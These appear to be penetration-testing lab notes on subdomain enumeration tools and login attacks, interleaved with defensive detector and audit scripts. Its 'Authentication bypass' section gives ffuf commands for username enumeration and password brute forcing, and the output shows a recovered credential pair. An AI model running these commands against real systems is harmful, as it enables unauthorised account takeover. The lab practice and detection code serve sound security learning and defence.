Subdomains
OSINT
DNS brute force
```bash
dnsrecon -t brt -d 10.10.10.10
```
OSINT - Sublist3r
```bash
./sublist3r.py -d domain.com
```
Virtual Host
```bash
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.domain.com" -u http://10.10.10.10
```
Fuzzing
```bash
gobuster dns -d domain.com -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -t 100
```
```bash
wfuzz -c -f sub-fighter,raw -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 2395 -u 'http://domain.com' -H "Host:FUZZ.domain.com"
```
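The DNS brute-force runs above (dnsrecon `-t brt`, gobuster `dns`) leave a very distinctive trace on the authoritative server: one client asking for thousands of distinct names under the same zone within seconds. The following detector is an added example, not part of these notes or of any of the tools listed; it parses lines in the shape of BIND 9's query log (the log lines themselves are constructed here) and flags a client that queries at least `min_distinct` different names in one zone inside a sliding window. The `zone_of` heuristic (last two labels) is an assumption you would replace with your own zone list.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumption: BIND 9 "queries" channel with the default print-time format, e.g.
# 02-Oct-2023 12:14:00.001 client @0x7f3e5c0fb2a0 10.10.14.5#51234 (api.domain.com): query: api.domain.com IN A +E(0)K (10.10.10.10)
QUERY_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2})\.\d+ client(?: @0x[0-9a-f]+)? "
    r"(?P<client>[\d.a-fA-F:]+)#\d+ \((?P<qname>[^)]+)\): query: \S+ IN (?P<qtype>\S+)"
)


def parse_query_line(line):
    """Return a dict for one query-log line, or None if the line is not a query entry."""
    m = QUERY_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%d-%b-%Y %H:%M:%S"),
        "client": m.group("client"),
        "qname": m.group("qname").rstrip(".").lower(),
        "qtype": m.group("qtype"),
    }


def zone_of(qname, depth=2):
    """Crude zone guess: the last `depth` labels. Replace with your real zone list."""
    labels = qname.split(".")
    return ".".join(labels[-depth:]) if len(labels) >= depth else qname


def detect_bruteforce(lines, window_seconds=60, min_distinct=20):
    """Flag (client, zone) pairs that query >= min_distinct different names in any window."""
    events = [e for e in map(parse_query_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["client"], zone_of(e["qname"]))].append(e)

    alerts = []
    for (client, zone), evs in by_key.items():
        start = 0
        in_window = {}          # distinct qname -> count inside the current window
        peak = 0
        for ev in evs:
            in_window[ev["qname"]] = in_window.get(ev["qname"], 0) + 1
            # slide the window start forward until it spans at most window_seconds
            while (ev["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                old = evs[start]["qname"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= min_distinct:
            alerts.append({"client": client, "zone": zone, "distinct_names": peak})
    return alerts


def _line(ts, client, qname):
    """Build one constructed query-log line (sample data, not a real capture)."""
    return (f"{ts} client @0x7f3e5c0fb2a0 {client}#51234 ({qname}): "
            f"query: {qname} IN A +E(0)K (10.10.10.10)")


# Constructed sample: one client walks 25 wordlist names in 25 seconds,
# another just resolves www a few times.
SAMPLE_LINES = [
    _line(f"02-Oct-2023 12:14:{i:02d}.001", "10.10.14.5", f"host{i}.domain.com")
    for i in range(25)
] + [_line("02-Oct-2023 12:14:05.200", "10.10.14.9", "www.domain.com") for _ in range(3)]


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LINES):
        print(f"{alert['client']} asked for {alert['distinct_names']} distinct names in {alert['zone']}")
```

Wildcard-aware tools first query a random label to check for wildcard resolution; that single query falls inside the same window and simply counts toward the threshold.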
Altdns
Subdomain discovery through alterations and permutations
Usage:
```text
❯ ls -la
total 19580
drwxr-xr-x 2 b0ysie7e b0ysie7e 4096 oct 2 12:14 .
drwxr-xr-x 3 b0ysie7e b0ysie7e 4096 oct 2 10:01 ..
-rw-r--r-- 1 b0ysie7e b0ysie7e 20032864 oct 2 12:14 list_subdomain.txt
-rw-r--r-- 1 b0ysie7e b0ysie7e 67 oct 2 12:11 subdomain.txt
```
```text
❯ cat subdomain.txt
api.domain.com
delta.domain.com
yellow.domain.com
web55.domain.com
```
```bash
altdns -i subdomain.txt -o new_subdomain.txt -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r -s results_output.txt
```
Amass
Brute force, Google, VirusTotal, alt names, ASN discovery
Passively search for subdomains of a domain:
```bash
amass enum -passive -d domain_name
```
Find subdomains of a domain and actively verify them by attempting to resolve the subdomains found:
```bash
amass enum -active -d domain_name -p 80,443,8080
```
Run a brute-force search for subdomains:
```bash
amass enum -brute -d domain_name
```
Save the results to a text file:
```bash
amass enum -o output_file -d domain_name
```
Save the results to a database:
```bash
amass enum -o output_file -dir path/to/database_directory
```
Dig
Zone transfer, DNS lookups & reverse lookups
Subdomain enumeration
```bash
dig domain.com @10.10.10.10
```
Zone transfer enumeration
```bash
dig domain.com @10.10.10.10 axfr
```
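A nameserver that answers the `axfr` query above hands out its whole zone, which is the single most complete subdomain list an enumerator can get; the fix on the server side is to restrict transfers to the secondaries (`allow-transfer` in BIND). The script below is an added example, not part of these notes: it parses the text that `dig ... axfr` prints, reports whether the transfer was allowed and lists the hostnames that leaked, so it can be run against each of your own authoritative servers as a recurring check. The two embedded outputs are constructed samples (open zone vs. `; Transfer failed.`), and `run_dig_axfr` only wraps the real `dig` binary.

```python
import subprocess
import sys

# Record types whose owner name is a hostname worth inventorying after a leak.
HOST_TYPES = {"A", "AAAA", "CNAME"}


def parse_dig_axfr(output):
    """Parse the text printed by `dig <zone> @<ns> axfr` into a list of record dicts.

    Comment lines (';' and ';;'), blank lines and the trailer are skipped, so a
    refused transfer ('; Transfer failed.') yields an empty list.
    """
    records = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)          # name ttl class type rdata
        if len(parts) < 5 or parts[2] != "IN" or not parts[1].isdigit():
            continue
        name, ttl, _cls, rtype, rdata = parts
        records.append({"name": name.rstrip(".").lower(), "ttl": int(ttl),
                        "type": rtype, "rdata": rdata})
    return records


def audit_axfr(output):
    """Summarise one dig axfr run: was the zone transferred, and which hostnames leaked."""
    records = parse_dig_axfr(output)
    hosts = sorted({r["name"] for r in records if r["type"] in HOST_TYPES})
    return {"transfer_allowed": bool(records), "record_count": len(records), "hostnames": hosts}


def run_dig_axfr(zone, nameserver):
    """Invoke the real dig binary (assumed installed); this is the only network call."""
    proc = subprocess.run(["dig", zone, f"@{nameserver}", "axfr"],
                          capture_output=True, text=True, check=False)
    return proc.stdout


# Constructed sample: a server that allows the transfer (names mirror the notes above).
AXFR_OPEN_OUTPUT = """\
; <<>> DiG 9.18.12 <<>> domain.com @10.10.10.10 axfr
;; global options: +cmd
domain.com.        3600  IN  SOA    ns1.domain.com. hostmaster.domain.com. 2023100201 7200 3600 1209600 3600
domain.com.        3600  IN  NS     ns1.domain.com.
ns1.domain.com.    3600  IN  A      10.10.10.10
api.domain.com.    3600  IN  A      10.10.10.20
delta.domain.com.  3600  IN  CNAME  api.domain.com.
web55.domain.com.  3600  IN  A      10.10.10.55
domain.com.        3600  IN  SOA    ns1.domain.com. hostmaster.domain.com. 2023100201 7200 3600 1209600 3600
;; Query time: 3 msec
;; SERVER: 10.10.10.10#53(10.10.10.10) (TCP)
;; WHEN: Mon Oct 02 12:14:00 UTC 2023
;; XFR size: 7 records (messages 1, bytes 248)
"""

# Constructed sample: a correctly configured server.
AXFR_REFUSED_OUTPUT = """\
; <<>> DiG 9.18.12 <<>> domain.com @10.10.10.10 axfr
;; global options: +cmd
; Transfer failed.
"""


if __name__ == "__main__":
    # usage: python3 axfr_check.py domain.com 10.10.10.10
    if len(sys.argv) == 3:
        result = audit_axfr(run_dig_axfr(sys.argv[1], sys.argv[2]))
    else:
        result = audit_axfr(AXFR_OPEN_OUTPUT)
    print(result)
```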
Dnscan
```bash
git clone https://github.com/rbsec/dnscan.git
cd dnscan
pip install -r requirements.txt
python3 dnscan.py -d dev-%%.example.org
```
Dnsrecon
DNS zone transfer, DNS cache snooping, TLD expansion, SRV enumeration, DNS records enumeration, brute-force, check for Wildcard resolution, subdomain scraping, PTR record lookup, check DNS server cached records, mDNS records enumeration…
```bash
python dnsrecon.py -n ns1.domain.com -d domain.com -D subdomains-top1mil-5000.txt -t brt
```
Dnssearch
Subdomain enumeration
```bash
dnssearch -domain domain.com
```
```bash
dnssearch -domain domain.com -cname
```
Gobuster
```bash
gobuster dns -d domain.com -w /usr/share/wordlists/dirb/common.txt -i
```
```bash
gobuster vhost -u domain.com -w /usr/share/wordlists/dirb/common.txt
```
```bash
gobuster vhost -u domain.com -w /usr/share/wordlists/dirb/common.txt -v
```
Google
Usage
Find subdomains: site:*.target.com
Find subdomains & exclude specific ones: site:*.target.com -site:www.target.com -site:help.target.com
Knock
AXFR, virustotal, brute-force
```bash
knockpy domain.com --silent
knockpy domain.com --silent json
knockpy domain.com --silent json-pretty
knockpy domain.com --silent csv
```
Massdns
Subbrute
Subfinder
VirusTotal, PassiveTotal, SecurityTrails, Censys, Riddler, Shodan, Bruteforce
Authentication bypass
Brute-force username enumeration
```bash
ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.10.10/customers/signup -mr "username already exists"
```
```text
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.61.51/customers/signup
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/Names/names.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&email=x&password=x&cpassword=x
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Regexp: username already exists
________________________________________________
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 214ms]
* FUZZ: admin
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 197ms]
* FUZZ: robert
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 203ms]
* FUZZ: simon
[Status: 200, Size: 3720, Words: 992, Lines: 77, Duration: 199ms]
* FUZZ: steve
:: Progress: [10177/10177] :: Job [1/1] :: 210 req/sec :: Duration: [0:00:51] :: Errors: 0 ::
```
Brute-force password enumeration
```bash
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.61.51/customers/login -fc 200
```
```text
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.61.51/customers/login
:: Wordlist : W1: /home/b0ysie7e/seven/tryhackme/jrPenetrationTester/SubdomainEnumeration/autheticationBypass/valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 200
________________________________________________
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 322ms]
* W1: steve
* W2: thunder
```
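All three web-side runs in these notes (the Host-header fuzzing under Virtual Host, the signup enumeration matched on "username already exists", and the login brute force filtered on `-fc 200`) look alike from the server: one source address, a burst of requests to one endpoint or with many different Host values, and a wall of identical 200s with at most one 302 at the end (the successful `steve`/`thunder` pair above). The detector below is an added example and is not part of these notes or of ffuf; it reads access-log lines in an assumed nginx-style format that also records `$host`, aggregates per client address, and raises one alert per behaviour. The log lines, thresholds and the `/customers/...` endpoint mapping are constructed for the example; the endpoints themselves are the ones the ffuf output above targets.

```python
import re
from collections import defaultdict

# Assumed log_format (not the nginx default): add "$host" after the time field so
# that Host-header fuzzing is visible, e.g.
# 10.10.14.5 - [02/Oct/2023:12:14:01 +0000] "dev.domain.com" "GET / HTTP/1.1" 200 2395
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - \[(?P<ts>[^\]]+)\] "(?P<host>[^"]*)" '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'
)

# Endpoint -> alert kind. Constructed for this example; the paths are the ones
# the ffuf runs above post to.
WATCHED_ENDPOINTS = {
    "/customers/signup": "username_enumeration",
    "/customers/login": "password_bruteforce",
}


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(lines, endpoints=WATCHED_ENDPOINTS, vhost_threshold=10, post_threshold=10):
    """Aggregate per client IP and return a list of alert dicts.

    - vhost_enumeration: >= vhost_threshold distinct Host values from one IP
    - username_enumeration / password_bruteforce: >= post_threshold POSTs to a
      watched endpoint; 'redirects' counts 3xx answers, which on this app mark a
      successful login (see the 302 in the ffuf output above)
    """
    per_ip = defaultdict(lambda: {"hosts": set(),
                                  "posts": defaultdict(lambda: defaultdict(int))})
    for e in filter(None, map(parse_line, lines)):
        rec = per_ip[e["ip"]]
        rec["hosts"].add(e["host"].lower())
        if e["method"] == "POST" and e["path"] in endpoints:
            rec["posts"][e["path"]][e["status"]] += 1

    alerts = []
    for ip, rec in per_ip.items():
        if len(rec["hosts"]) >= vhost_threshold:
            alerts.append({"ip": ip, "kind": "vhost_enumeration",
                           "distinct_hosts": len(rec["hosts"])})
        for path, statuses in rec["posts"].items():
            attempts = sum(statuses.values())
            if attempts >= post_threshold:
                redirects = sum(n for s, n in statuses.items() if s.startswith("3"))
                alerts.append({"ip": ip, "kind": endpoints[path], "path": path,
                               "attempts": attempts, "redirects": redirects})
    return alerts


def _line(ip, host, method, path, status, size):
    """Build one constructed access-log line (sample data, not a real capture)."""
    return f'{ip} - [02/Oct/2023:12:14:01 +0000] "{host}" "{method} {path} HTTP/1.1" {status} {size}'


# Constructed sample: 10.10.14.5 fuzzes Host values, hammers signup, then brute
# forces login until a 302; 10.10.14.9 is an ordinary user.
SAMPLE_LOG = [
    _line("10.10.14.5", f"{w}.domain.com", "GET", "/", 200, 2395)
    for w in ("www", "mail", "dev", "api", "test", "staging",
              "admin", "beta", "vpn", "portal", "shop", "blog")
]
SAMPLE_LOG += [_line("10.10.14.5", "domain.com", "POST", "/customers/signup", 200, 3720)
               for _ in range(15)]
SAMPLE_LOG += [_line("10.10.14.5", "domain.com", "POST", "/customers/login", 200, 3720)
               for _ in range(19)]
SAMPLE_LOG.append(_line("10.10.14.5", "domain.com", "POST", "/customers/login", 302, 0))
SAMPLE_LOG += [_line("10.10.14.9", "domain.com", "GET", "/", 200, 2395)] * 2
SAMPLE_LOG.append(_line("10.10.14.9", "domain.com", "POST", "/customers/login", 302, 0))


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The `redirects` count is what turns a noisy alert into an urgent one: a login burst with zero 3xx responses is a failed attack, one that ends in a 302 is a compromised account. The signup enumeration itself is only possible because the application returns a different message for an existing username; a generic "check your e-mail" response removes the oracle the `-mr "username already exists"` matcher depends on.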